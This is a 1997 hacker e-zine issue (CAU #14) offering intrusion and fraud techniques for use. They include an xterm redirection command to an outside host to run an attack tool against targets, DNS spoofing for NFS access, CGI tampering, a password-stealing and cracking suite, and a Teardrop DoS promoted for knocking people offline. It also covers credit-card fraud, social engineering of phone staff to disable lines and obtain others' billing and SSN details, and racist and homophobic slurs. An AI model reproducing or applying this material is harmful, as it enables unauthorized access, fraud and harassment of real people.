_____________________________________________ / \ | ___________________________________ | | | | | | | | | | | | | | | | | | | | | _________| | | | | | / \ | | | | / \ | | | | / \ | | | |__________/ \__________| | | / | \ | | / | \ | | / | \ | | /______________|______________\ | | | | Computer Academic Underground | | | | Electronic Magazine | | #0014 | | 1215.97 | \ _____________________________________________ / ############################################################################## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ============================================================================== ------------------------------------------------------------------------------ .............................................................................. Table of Contents Foreward New CAU Member! I)ruid General Member Listing -= CAU =- 817 2600 Meeting -= CAU =- Christmas Presents -= CAU =- Visuals With Mr. Potatohead I)ruid Sublime's Top 20 Sublime Hacking Fun with X App Display Redirection I)ruid Modern DNS/BIND Spoofing MajestiX CGI Hacking - Vol. 1 broken- HackIt! v.1.0.0 Overview I)ruid Exploit of the Month -= CAU =- Phreaking Stocking Stuffers int3l I)ruid's Novice Corner I)ruid Closing ############################################################################## Foreward Merry Christmas, and a Happy New Year. This is the Christmas 1997 issue of the CAU E-Zine! Anyway, not much has happened since the last zine came out, aside from me working on various CAUGHQ stuff like coding and setting up new drivers for the mailing lists and other system functions like that. I'm getting a much better response from non-CAU members in relation to article submission and zine feedback. A lot of good ideas for zine formatting and such have been sent to the zine mail account, and I've gotten a couple of articles submitted to the articles mail account. But anyway, enough of my rambling, on to the articles. I)ruid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% New CAU Member! I would like to annouce the addition of our newest member, MajestiX, who was nominated, voted on, and offered membership to the CAU on December 4th, around 10:30 pm. I)ruid ############################################################################## General %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Member Listing (In the order in which they were brought into the CAU) Handle IRC Nick E-Mail -------------------------------------------------------------- I)ruid I}ruid druid@caughq.org Ultra Violet uv_ uv@caughq.org Crimson Assassin Crimson_A crimson@caughq.org Fizban Fizban^ fizban@caughq.org Sublime sublime sublime@caughq.org int3l int3l int3l@caughq.org MajestiX maJesTix- majestix@caughq.org -------------------------------------------------------------- P.S. I (Sublime) would just like to say that an Egyptian should never be above the WHITE man. :) -= CAU =- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 817 2600 Meeting First Friday of Every Month 6:00pm until 9:00pm Cafe Cybre 481 Harwood Road Hurst, Texas Phone: METRO: 817.268.0060 People are actually showing up every month... -= CAU =- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Christmas Presents Merry Christmas! It's time to open presents, so bust out your tar and your gzip and get ready, cuz Santa I)ruid is ready to pass out yer gifts... heh For Christmas I give to the general population: HackIt! v.1.0.0 by I)ruid of [CAU] Whee!!! isn't this fun. Allright, because of the complexity of this Systems Administrator Tool Suite, I have written a seperate section in this zine dedicated to explaining a little more about it than I could in this section. So go read it, download the .tar.gz'd version from the ftp site or the web site, and have fun. Oh, and just so you know, I wouldn't suggest using any scripts or admin tools I write without at least learning a little bit about what and how it's doing what it's doing. And if your going to use the fruits of my labor to simply break into as many systems as possible, at least learn how to do it manually first... there's nothing I hate more than an ignorant script kiddie. Also for Christmas, int3l has been generous enough to provide a whole BUNCH of random phone stuff to stuff your stockings with. Check out the Phreaking Section for his article this month, composed of a whole lot of random phone tricks, tips and information (Stocking Stuffers). -= CAU =- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% How To Get Visuals With Mr. Potatohead Okay, I know your thinking "What tha???", but it's true! You can get some pretty nifty visuals off of your monitor and a vibrating Mr. Potatohead. I have seen these Mr. Potatohead's at Texas Drug Warehouse for around $2. I'm not sure where else they are available, but I'm sure they can be found. Anyway, First of all, you need Mr. Potatohead, your computer monitor, and some test software. I suggest trying acidwarp, cthuga, and space invaders. Just run your test software, sit back in your chair and look at the screen. It also helps if the lights are turned out and the only light in the room is coming from your monitor. For a wavy, side to side effect, start up Mr. Potato head and press his feet into your temple on the side of your head. The harder you press, the more extreme the effect. For a pulsating, up and down effect, placing Mr. Potatohead behind your neck and leaning back in your chair works well. I have found that acidwarp and cthuga provide for a constant, repetative effect, and other software such as space invaders that has small moving sprites provides for a more non-repetative experience. Anyway, the point is, you can get some pretty niphty visuals off of Mr. Potatohead. He doesn't leave you feeling worse than when you started, and he's not addictive. I)ruid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Sublime's Top 20 Reason We Have Niether Seen, Nor Heard From UV (Ultra Violet). ( Read like David Letterman or it is not as effective ! ) 20 * Sold his car for a ride ? (dont ask). 19 * Sent to Oklahoma by his mother who flipped out on him but he'll be back in a week. (* trust me *) 18 * Hired by the american gov. to be an asian spy for his ability to blend in good with their apperence (and his excellent konichewah). 17 * Wandering the earth in search of the eternal PooF. 16 * Became a full time PIMP. 15 * Is widowed ! 14 * Break Dance Camp .... in South Central L.A... 13 * Has dropped Ultra and is now just "Violet". 12 * Two words: DRUG LORD ! 11 * Convinced 2 pac is still alive. 10 * Perl scripting has claimed another victim. 9 * Gone to find his real father PooF DaDDY. 8 * Been hanging around monkeys with large afros. 7 * Decided to actually KILL WHITEY !! 6 * Stole THE SOBAKOWA PILLOW and has been in hybernation ... or hiding ? 5 * Finally got arrested for stalling out while stealing a SWB car. 4 * Bet and LOST his soul to the devil in a GO-FISH game. 3 * Went to HELL to get it back (His soul that is). 2 * Has read int3l's article and pulled his own heat coil. 1 * HIS MOM HAS CUT OFF HIS POOF AND HE HAS JOINED THE KLAN. (..You Know Which One..) ------------------------------------------------------------------ P.S. ( ..Myself, Sublime would just like to state that these are all in ) ( good humor, for we wouldn't want a poofy haired angry kid on our) ( streets running wild... (possibly BUCK WILD)... ) ------------------------------------------------------------------- SuBLiME ############################################################################## Hacking %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Fun with X App Display Redirection Most people don't realize this, but most applications and programs designed for use on a unix X windows system have the command-line option -display or -hostdisplay built in, as a standard. This command line argument is a standard X Toolkit command line argument. If your not familiar with this option, it is a command-line switch to send the display of the program or application being run to another host and display. Most of the time, the switch is formatted like this: -display host:display where host is the ip or hostname of the target machine and display is the X Windows display ID, in the format XSERVER.DISPLAY (normally you would want to use 0.0 meaning the first X server and the active (first) display). What this allows you to do is run (for example) xtetris -display TARGETIP:0.0 and send the display to that output. Mainly this is useful because you can use the processing power and binaries on one machine and be working on another completely different machine. Now, "How can it be that easy???" you ask... It isn't. First of all, the target machine must allow connections to it's X server from your host. This is accomplished via the xhost utility. From the xhost manpage: The xhost program is used to add and delete host names or user names to the list allowed to make connections to the X server. If your host is not in the target machine's xhost allow list, your host will not be allowed to send the display of it's x-binarys to the target's x server. As far as I can tell, there is only one way around this: Add yourself to the xhost allow list on the target machine. Xhost security permissions can only be changed by running xhost on the local machine, you cannot be connected from a remote host and execute this command successfully. One way I have found to add myself to the xhost allow list is to gain root privileges on the target machine and edit the startx script, adding the commandline "xhost +" or "xhost +MY_IP" near the end of the file. Thus the next time the xserver is started, I will be allowed. It is also useful to "accidentally" kill the xserver (considering that you are root by now) to cause the X windows user to restart, thus executing the command line for you. I mentioned two different command lines above for two reasons: First, "xhost +" simply allows ALL connections to the X server, which could be useful, and Second, sometimes you may not want to put your ip in there. I'm sure you can find other creative ways to add yourself to the xhost allow list, so I'll move on. Okay, now we are allowed to make connections to our target machine's X server. One fun thing to do, if the target is a co-worker, is infect their desktop with roaches, via xroach. I have found it funny to send a plague of 15 roaches or so to my co-worker's desktop and wait for the "ACK!" when it surprises them. Another funny surprise to send someone xeyes... Just imagine your working, and a couple of eyes pop up and start watching your mouse. Did I mention that the X user cannot kill these processes that are on their desktop without killing their x server, because the process is not actually running on their machine? (At least I have not found a way to do it.) Changing the background can be accomplished on some window managers such as afterstep and enlightenment. As this is all fun and games, much more useful things can be acomplished with this technique, as you will soon find out. And now, the flip side... Not only can you run processes on your machine and send them to other people's X servers, but you can also run processes on other people's machines and send them to YOUR X server. This technique is used in many remote exploits in an effort to gain a shell by redirecting an xterm. Since you have control over your machine, running "xhost +" as root is not a problem. All you need on the other machine is a login with enough access to run at least xterm, or any other X application you want to run. If it's not an application or program desined for X, you can usually run it inside an xterm and redirect the xterm. As you can see, this can be very useful, especially when you nohup and background the process, and then log out. If the remote machine has a modem connected to an outside line, the xminicom utility is VERY useful. And now, I'll let your imagination go wild, while I get on to other important things I must do. P.S.: $ nohup xterm -display caughq.org:0.0 -ut -e /root/hackit/hackit -l targetlist & $ logout Connection closed by foreign host. I)ruid [ EDITOR'S NOTE: After I wrote this article, I found some other interesting stuff to do with Xwindows and display targeting on www.rootshell.com, you may want to check it out. Also, there are Windows 95 Applications that emulate an X server allowing redirection of X applications to windows boxes. ] %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Modern DNS/BIND Spoofing Well, I ment to write this article for about, well...two zines back. So the purposes of DNS/BIND spoofing now, are very well limited, but not completey useless. Lots of people's first confrontations with any kind of spoofing, is unfortunately most-likely IRC. From what I understand, and from personal experience, DNS/BIND spoofing in IRC as of now, is almost (if not) impossible. About two or three months ago, were when the last days of possible IRC spoofing on large IRC servers/networks such as EFNet, Undernet, DALNet, etc...existed. Well, dont give your hopes up, just because you cannot go into channels and brag to your friends about how cool you are because your address is: homie@stole.a.spaceship.from.nasa.gov etc, etc... Doesnt mean that their is nothing else you can do. Original DNS/Spoofing was not made to be able to take over channels, or to "brag." It was used for gaining restricted remote access to computers that had wrappers, etc. One of the most obvious tools that you can still as of now use DNS/BIND spoofing for, is exploiting NFS. Its not really exploiting, but more of a tactic, even though you are exploiting BIND on the server cacheing to... it is still more of a tactic, since the actual exploiting of the server its self is such a minority in the whole process. So, im gonna include a so-called "kit" on how to setup a site for spoofing, and a couple example exploitation tactics possible with modern DNS/BIND spoofing. First, we will start with some of the rumors that I have heard about DNS/BIND spoofing: 1.) Rumor: "The only DNS/BIND spoofer that works is erect.c." Fact: Bull crap, the only DNS/BIND spoofer that I have ever used personally is jizz.c. Now, I will admit any day, that erect.c is far more effecient than jizz.c. And that jizz.c is definately not completely dependable. But, later on with this article, I will provide a small shell script that will make jizz.c not only easier to use, but also a tad bit more effecient. 2.) Rumor: "When you use jizz.c you have to wait an hour before you can spoof the same IP again." Fact: This is a debatable rumor in itself. From what I understand, the history of jizz.c is quite varied. The older versions of jizz.c did not have a "TTL Modification Option." TTL stands for "Time To Live", and well, it means exactly what it says. TTL is the time that the "spoof" will live for. So, maybe in the past versions of jizz.c it DID take an hour for everything to "reset." But, in the newer versions of jizz.c you do have an option, and can change that rumor by yourself. So is it a rumor? You decide. 3.) Rumor: "I like to DNS/BIND spoof because, I know that no one will know my real IP, so they cant hurt my system." Fact: Wrong, their *were* a couple servers where this "rumor" was true. But the majority of servers allowed a simple command such as: /stat L homie which would show: %% irc.homie.NET homie[homie@69.69.69.69] 93 282 18 146 4 and reveal your true identity. Well, over the time that I had been DNS/BIND spoofing, and I was researching it all, their were many more rumors that I had heard, but since it was so long ago, those are the only ones that really stand out in my head right now. Ok, now here are the simple steps to setting up a good DNS/BIND spoofing "site." Lets go!: 0.) I didnt want to have to put this in here, but since some of you might be a little incompetent, I will remind you that you MUST have root on the authorative NS. Without, your not gonna spoof jack-diddley-squat...___bottom line___. 1.) Make sure the that the NS (Nameserver that you plan on targeting) is a authorative NS. What I mean by authorative is, that the NS has to be considered a "Class C" network registered by interNIC. Determining this is quite simple, simply estimate how large the network itself is, and guess. Heck, you might not guess acurately, but im also assuming that you have nothing better to do. 2.) Patch the DNS software (BIND in this case) with a simple patch. The patch patches the file (from BINDS root directory) named/ns_req.c. To patch this patch to named/ns_req.c simply use the command "patch -p1 < ns_req.c" or any other options you would like to use, for more options RTFM! Type "man patch." After this patch is applied correctly, simply compile the NEW BIND just as you would minus the patch. The patch is below, and the patch itself should be named "ns_req.c.patch". ------Cut Here!------ [ EDITOR'S NOTE: The actual patch has been cut out and put in the included file "ns_req.c.patch" for reading convienence. ] ------Cut Here!------ The first 50 or so lines in the above patch will need some minor configurations, but not many. 3.) Well, you have compiled BIND correctly, and killall -HUP named. So, next of course, you install the spoofer itself. In this case, im going to use jizz.c as the example, since thats all I used. You can get jizz.c from many places. The best place to get it, is: http://rootshell.connectnet.com You might want to edit this source till you are satisfied, but you will most likely not have to. 4.) Well, now you have the source, and by now have it compiled it. Lets move on, well, the process of spoofing with jizz, is drug out and extremely tiresome. So, I have found a shell script (Location not released) that I have found *extremely* useful. Here it is: ------Cut Here!------ [ EDITOR'S NOTE: Shell script also included in a seperate file. I called it maj_script.sh ] ------Cut Here!------ In the shell script above, there will be a numerous amount of lines that may include domain.net or hostname.domain.net. You need to customize that to fit the configuration of the NS that you are using. Then, name this file "crap" or something... it doesnt matter, simply run "crap" and it will give you output such as: usage: jizzinterface The syntax to this script, is determined once again by the configuration of the NS itself. 5.) Well, you have patched BIND, you have downloaded and compiled jizz.c. You have configured the script, what next? Well, the fun stuff. If you have been reading this only to try and spoof IRC, you will be trying an extremely long time. Why? Because it's not gonna happen. So move on to the next article at this point. Well, if your here for the more logical purposes of DNS/BIND Spoofing, then keep reading. Here is ONE example of what you can do with DNS/BIND Spoofing. Well, theres a system that you want extremely bad, and their is no obvious way to gain access to it. Its wrappers are set to deny everything except localhost and localnet. But, wait! You havent tried NFS showmount yet, have you? Well, lets find out. > showmount -e target.net Export list for target.net: / (everyone) Well, now you should be damn happy. But what if it was: > showmount -e target.net Export list for target.net: / (homie.target.net) Then what? Give up? Nay...this is where DNS Spoofing comes in handy. So what do you do? Well, you simply cache a spoof to target.net which says that your IP (69.69.69.69) resolves to home.target.net and waaa lah! You have complete access to that system. Well, the first needed thing to know in order to spoof, is what NS target.net is using. So, we go to our shell and type: > whois target.net And then look for Domain servers in listed order: Now, their should be *two* NS address's listed below this line of text. Those are two possible NS's the target host is using. But remember, they may very well be nothing close to what you are looking for. But, lets say that it shows NS.TARGET.NET 109.109.109.109 NS1.TARGET.NET 109.109.109.1 Or something like that, then we will go into our NS, and simply run the script, and tell it to cache to NS.TARGET.NET that 69.69.69.69 == homie.target.net Once this is done, you SHOULD be able to access they system via NFS. If you do not know what to do from there, you need to be reading much more than just this article. Well, their is one other example that I can explain what DNS/BIND Spoofing is useful for, but I will not actually explain it, just simply give a hint. So here it is: PHF + RHOST + DNS/BIND Spoofing == Access! So use your brain and figure it out. If you have any questions/problems and/or death threats, please send them to: majestix@caughq.org. Or you can sometimes reach me on a EFNet IRC server as maJesTix-. Usually in #skank or #817. maJesTix %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% CGI Hacking - Vol .1 A. General 1. Wut Is CGI Well Your prolly wondering wut in the hell is a CGI. Well a CGI is a SeverSide executable. Basiclly, when you login to your nifty porn site a CGI processes the login an jumps you to the link, most of the time. Cgi's are used in forms alot to to process information such as when you apply to download the us version of netscape... 2. Wut Is Perl Perl is the unix application in which "MOST" cgi's are written their mostly written in bianary format but some insit on running perl -t for text cgi executables... kinda like ./bleh.sh . Perl has had it faults in the past for being suid an stuff. if you dont know wut suid is your a clueless moron.... 3. Wut Is Unix I'm not gonna go into detail about this one, infact check att.com to see the exact history of unix... Unix was a project in the 60's which Berkly Students worked on for at&t. Of course at&t funded the money but eventually it was adopted to run the dpd11 phone switches then the real multiuser abilities were found... Around the same time the ARPA project was being done by MIT an the gov unix seemed a greay resource for it also an well you can see wut happend from there.... 4. How do i get started? Well i'm glad i asked... Ok you are horny an you want pr0n fast and blehpron.com has a cgi form for entrys. Well, you fill it out, fake information of course... Ok now if spits back some error like this TransAction_FAILED Look at the location bar in the browser, see it reads http://www.blehpron.com/ deny.cgi?&f&TransAction_FAILED^BleH_ErroR OK Look at that for a second THINK try this http://www.blehpron.com/ accept.cgi?&f&TransAction_FAILED^BleH_ErroR Now It should take the stuff from the field of the query, btw it isn't a command line it's a cgi qeury, and spit out your login and passwd. INSTANT PORN **** OK if you have any sense at all you have seen isp's that ALLOW for **** **** you to fill out cgi based forms to apply for instant credited shell **** **** Now that you have a """SHELL""" you can remotely hack the system an **** **** should never see it coming cuase well most isp's are brian dead. **** Now that you have the basic idea go for it The more you know the more you get paid in your future job... ============= contact info ============= You can contact me, broken-, in EFnet's #2600, #telephony & #817 or broken@cyberdude.com broken- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% HackIt! v.1.0.0 Overview Okay, as I mentioned in the CAU Files Released section, HackIt! v.1.0.0 is your Christmas present from me. And if you don't celebrate Christmas, then I'm just giving it to you for the hell of it. Anyway, here's a breakdown of how it works, how to add to the HackIt! Suite, and generally what it can be used for. First of all, how does it work? It's real simple. The main HackIt! module is not complicated at all. It simply looks at the 'hackit.cf' file and executes each individual module, in the order that they are found in the file. Basically just a program that runs other programs. The beauty of this is that HackIt! is completely modular, and it can run as many modules as you want to put into the config file. The actual attack/exploitation of sites comes from the individual modules, not HackIt! itself. Here's an explanation of each level of modules and what their general purpose. You can have more than three levels, however, I find it simpler to catagorise all modules into one of the three levels. The three levels of modules work together by leaving files for the next level. For example, the first level modules leave files for the second level modules to find, the second level leaves files for the third level to find, and so on until the last level, which leaves an output file for the user. Any type of modules can be designed for HackIt!, as long as they know what type of file and format of filename to leave for the next level modules to take care of. For example, First level modules Phfit, Phpit and NFSit all leave 'exploit_id-hostname.passwd' files for the second level module CrackIt to find. It's all about knowing where to leave stuff and what to call it. The first level of modules is designed for remote penetration testing. The three modules that come included with HackIt! v.1.0.0 (Phfit, Phpit, and NFSit) are designed to grab password files via Phf, Php and NFS, and leave them for the second level module Crackit. First level modules do not necessarilly have to grab password files, they can be designed to probe for open ports and leave a list for the second level modules, or check a host to see if it's mountable via smbclient and leave an info file on the host for a second level module to find. I'll leave this up to 3rd parties who want to develop modules for Hackit, and I'll worry about my own module development. Second Level modules are mainly designed for doing local work on the results of the first level, such as Crackit, which cracks password files left by the First level modules Phfit, Phpit and NFSit. I only run the first two rules of crack to speed up the process, but the passwd files could be saved for manual cracking at a later time. My first level modules leave the *.passwd files in ./.tmp/ for later use, and my second level module (CrackIt!) leaves *.cracked files there also, but be careful, because HackIt! cleans this directory every time it's run (after all, it is a temp directory). Third level modules are designed to act on the results of Second level modules. There are no third level modules developed at this time, but I plan to develop RootIt, to attempt to login to the target system based on logins and passwords provided by CrackIt, and try a few generic exploits. There are other programs that exist out there similar to this, which could be easily used as a HackIt! module with minimal modification. Like I said, it's all about knowing where to have your modules leave certain files for the next level of modules. These types of modules are not bound to these levels, these are just the level definitions that I choose to work with, and I will develop modules for in the future. You could have 80 levels of modules if you wanted to develop them, but I choose to have 3 levels. It's all based on your personal preference. I designed the HackIt! Suite to be flexible and hopefully will suit everyone's needs, from the script kiddie that should get a clue to the busy Security Administrator that dosn't have time to check every machine on his network for new exploits, to the crazy-insane hacker that just wants to skip the boring routine of checking systems for basic and old exploits when they could be doing other things like taking over GTE Cybercenters... heh... When a new exploit comes out, hopefully someone will develop a set of HackIt! modules (I will attempt to do this frequently) and you will be able to get these modules, plug them in, and test your network. This Suite was mainly designed for a Security Administrator's tool, so don't abuse it, or I will have to hunt you down and beat a clue into your skull. If the HackIt! Suite gets a decent response, and people actually do develop modules for it, I will set up a HackIt! support page on the CAUGHQ website to support and maintain HackIt!, as well as provide a single location to get the newewst modules, information, and versions of the HackIt! Suite. Anyway, that's about it for the general overview, so check the documentation for more detailed information. HackIt! is availabe on the CAUGHQ ftp server (ftp.caughq.org) and the CAUGHQ website (www.caughq.org) so go get it. I)ruid %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Exploit of the Month Ok, this month, the Exploit of the Month award has to go to Teardrop... Teardrop is a fragmented ping attack that causes a fault in most Linux kernels, as well as Windows 95 and Windows NT machines, and many other OS's, causing the machine to either reboot or lock up, or generally go crazy. This DoS attack is executed remotely, and the exploit code included can spoof the source IP of the packet. Exploit code has been included in a seperate file for space purposes. External file is 'teardrop.c'. The patch for this exploit can be found on www.microsoft.com for Windows Machines, and ftp.kernel.org for linux machines, (pre-patch.2.0.32.gz) and this problem is fixed in linux 2.0.32 kernels. Anyway, most machines as of the date that I wrote this are NOT patched, and this can be extremely useful for taking someone offline, causing remote machine reboots (GTE Cybercenters (: heheh) and other fun stuff. -= CAU =- ############################################################################## Phreaking %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Phone Stocking Stuffers Well, It's been a while since I wrote an article, due to some Legal Problems with an unnamed Internet Provider. I think it's time I start to write stuff again. Now, for those who read this and think that Im the guy doing this *COUGH* Police, FBI, etc. *COUGH* Im just a third party ;) Yea. Anyways, Im tring to think about something to write about... Hummm,.. Okay... Okay, First off: For those guys who say, "CAU give me a Clue, Teach me to Hack Computers", If you wana hack you have to have a Hat, I mean a Big O' Dr. Suess, Horton Hears a Who type hat. Once you have the Hat, your ready to hack. Im sick of the word Hack. Okay from now on it's pimpin'. So, anyways back to what I was saying. You got a hat you ready to pimp. Speakin of Smackin Bitchs up, Ahhhh Nevermind... mabey later... heh Humm, Anyways... Enough of the B.S. ----Pimpin' the Phone Company in General---- HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA- Okay, If you don't know shit about shit, but you wana do some funny stuff, the phone company is the place to start. Through the Frame, you can Change the Line Class on a Residential Phone to a Class "C", meaning everytime someone wants to make a call it says "Please Deposit 25 cents." Anyone can do it, trust me. Just play dumb and act like your a new line technition. It's like your 3rd day on the job, and your having trouble with everything that has to do with telephones, They'll usally help you out, and tell you what everything means. If at anypoint you feel Unconfortable, just say, "Humm, I guess I'll go ahead and try to get a hold of my Supervisor" Don't EVER say shyt like, "WELL, FUQ YOU * CLICK" Because they will call the BOSS who calls their BOSS who Faxes a Warning to All the Switches. Basicly, Don't Say Stupid Shit. I HATE FAGGOTS WHO PRANK CALL SWITCHS/FRAMES THEY FUCK IT UP FOR EVERYONE! ----DA' PAYPHONE BLUES---- FUQN Southwestern Bell UP'ED THE PRICE OF PAYPHONES TO $.35. Thats some DAMNShit. Time to break out the ol' redbox. Redboxes are funny yet annoying, for those who use codes or for those who just can't seem to find a place where the crystal fits, break out your Credit Card Generator and Extrapulate from a REAL card. If you can't find a real card just generate card numbers and go down the list until you find one that works, This I imagin' will be VERY time Consuming, but when you find that one that works then you can Extrapulate off that one. Anyways, Lets pretend you have a REAL card number now. You would want to call (800)CALL-ATT. Thats right "Thank you, AT&T!". DO NOT call them direct if your calling from you House, At least OP Divert; Call "0" and have them dial 800-CALL-ATT. When you Op Divert to AT&T an AT&T operator should come on and say, "May I have the number your calling from Please?" Give them a BS Number, it's best to use your real area code the rest can be anything. Then give them the number you wana call. And a C.Card Number. BAMMM. Free Calls, About 80% World Wide. Thats right Even International Calls!@@ who0p?!@#$ hehe. There you go. Enjoy. AT&T only excepts, MASTERCARD and AMERICAN EXPRESS now. ---FIND WHAT LONG DISTANCE NUMBERS SOMEONE IS CALLING---- Humm,.. Some Basic Shit.. Look at the Number on your phone bill to call for Billing Questions, ((800)585.7928 Here) and you can look up other peoples phone bills. See how much they owe, Past/Present amount due... Just type in their phone number when it prompts you. You can also talk to a repair person there, and have them look up every long distance number on a bill. They'll be more than happy to tell you anything. Sometimes they'll even tell you the last four digits on the bill (The last four digits of the phone owner's Social Security Number) And with that you can add/Take off Features Like Call Waiting, Call Fowarding, REMOTE call fowarding (hehe), Long distance call block, etc... Put a password on there line so whatever you add they can't take off. ---PULLING HEAT COILS--- Pulling heat coils is fun. Basicly when you pull a heat coil, your taking taking the Voltage outa someones phone. It's some Funny shit, and alot of the times It has the Line Technitions Running around for a couple days... Heres what you wana do: Call up you local FRAME Not your SWITCH there is a diffrence, for some reason people think the SWITCHES are the same thing as FRAMES. Okay anyways, Call up to the FRAME and tell them -- Nevermind Heres what the converstaion should look like: -YOU: HowDy, How are you doin' Today? (* HICK ACCENT *) -THEM: Oh' Im doing okay, who's this? -YOU: Well, Alrighty this is Johnny Bahergalbo Over here at *whatever Frame you can think of other than the one your calling*. Im needin to pull a heat coil on a line. I don't have the cable and pair and I was wondering if you could look that up for me, Please. -THEM: Humm, Okay whats the number? -YOU: It's (???)xxx-xxxx *Phone Number* -THEM: Okay Be Right Back. -YOU: HAHAHAHAHAHAHAHA, FUCK YOU. *cough* I Mean, Well, Alrighty... -THEM: Okay, it's done. How long do you wana keep it out? -YOU: I'll be working on it for a while so, I'll Call back when Im done. Thank you ma'am. Are you into ButtFuckin'? -THEM: No, Why. -YOU: BETTER WATCH YO BACK BITCH! *CLICK* ---BUSY SHOES--- Okay, there are a lot of diffrent type of shoes. (No pun intended) One of them is called a Busy Shoe. A Busy Shoe does what it sounds like it does, it makes a person's phone line busy forever, but the person can still use it for outgoing calls whenever. Call up to your Local Frame and just simply tell them that you need to put a busy on a line. Give them the number and BAMM your done. Sometimes, they don't wana do it and they'll tell you, you need to call Survailance... No, before any of you get excited Survailance, is NOT what it's name says,.. From what I understand, they do tests on the big ass switches, like ?ESS.. ---HAVING TROUBLES GETTING INTERNAL PHONE COMPANY NUMBERS?--- The best thing to do when you can't seem to find a starting point or a number to start with, would be go dig through the trash at you local Phone Company Building. You WILL find some numbers to start out with. Just work your way up. Fun Numbers to have: CNA - Look up peoples Address/Names By typing in a Phone number. NOC - Network Operations Center NAC - Basicly the same thing a NOC. But alot of times it's Automated. FRAME - COILS, CABLE/PAIRS, TESTS, hehe SWITCH - Talk to some HillBillys that are usally in a drunken stuper. REPAIR - Can also Look up Cable/Pairs. This is actually a better starting point. You can get a LOT of shit from your local publicly availble Repair Center. Theres a LOT of other numbers I mean a SHIT load. My only advice is when you Social Engernieer, don't do it from your house unless you divert through something (e.g. AT&T). Questions? Comments? Somethin? E-Mail Me == int3l@caughq.org int3l %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% I)ruid's Novice Corner: Wardialing Tips and Technique (for the beginner) Allright, another one of my 'for the novice' articles, considering that Fizban has apparently given up on his Newbie Corner column. This article will basically give you a few tips and techniques for basic wardialing. First of all, if you don't know what Wardialing is, it's basically dialing random phone numbers out of a NPA (Number Processing Area (i.e. Area Code)) and prefix (First three numbers of your phone number) until you've dialed all of them, taking note at which ones give you carriers, tones, etc. The CAU used to provide a local scan or two each month, but as we've all become more interested in network and Internet hacking, we've done less and less on the local front, and no one seems to want to contribute scans anymore anyway, let alone actually scan them. Eventually I plan to have a machine and phone line dedicated to providing local scans for the zine, however, scans of other NPA's and prefixes would be greatly appreciated if they were sent in. Anyway, on to the list: 1) DOWNLOAD A DECENT WARDIALER - Using a cheesy wardialer will only slow down your scan and may inhibit the quality of your scan. I would personally suggest ToneLoc, but others also seem to like THCScan. There are a variety of WarDialers available on the net, so go look for them. There is also a collection of them on the CAU ftp site. 2) ALWAYS USE *67 - (or the Caller ID block prefix for your area) What this does is block your caller ID information from being sent to the numbers you are calling. Most people don't like it too much when they wake up in the morning and see that some random person called them at 3:42 am and woke them up, only to have it screech in their ear when they pick up, and will promptly call you back and yell at you. 3) CALL FORWARDING IS A PLUS - If your line is equipped with call forwarding, forward your line before you start scanning. This will eliminate scan interruptions from people calling you back with their wonderous *69 (call return). This will also discourage people that had planned to call you back and yell at you, especially when you forward your number to a disconnected number, thus giving them an error message, or forwarding it to the local mental hospital. If your line is not equipped with call forwarding, I would seriously suggest getting your phone company to hook you up for it. It is quite useful. 4) USE TIME-WINDOWS - Set up your scan to scan during certain timewindows. Normally you would want to scan Business prefixes at night, when no one is at work, and residential during the day, when no one is at home. Call where the people are NOT. I know, I know, most people say "Don't Scan Residential!" but why not? You may not find as many tones or carriers as in business prefixes, but what you DO find is usually very interesting or strange. Well, that's about it. There's really not much to Wardialing, just make sure that you don't re-call the same numbers more than once. Normally if someone yells at the phone company about harassment, you can point out that you only dialed that number once, and that you just dialed it wrong, therefore it's not harassment. If they then point out that you dialed EVERY number in that prefix once, tell them that you forgot the number but you knew it was in that prefix, and just dialed them all until you got it. And it just happened to be the last number you tried. Dosn't that always seem to happen? It's the last place you look? (: Anyway, as long as you play it cool, the phone company can't really do anything until it turns into harassment, after all, your paying them for the access to call any number you want to. Who is to say that you can't dial any number you want? I)ruid ############################################################################## Closing Well, this has been the best Zine yet in my opinion. And I was even able to stick to the Christmas Theme as well. I'm already in the process of putting together next month's Zine as well, and it's starting to look pretty good too. In case you havn't done this already, visit the CAUGHQ website (at www.caughq.org) and join the CAU mailing list from the main page. This way you will be informed of new files, new Zines, and updates on general CAU stuff. I usually release stuff to the CAU mailing list a few days before I release to the general public, so if you want to get a jump on CAU stuff, join the list. Also, just a reminder, send all article submissions, letters to the editor, and general zine stuff to articles, letters, and zine @caughq.org (respectively). I)ruid ############################################################################## ____ ____ __ __ / \ 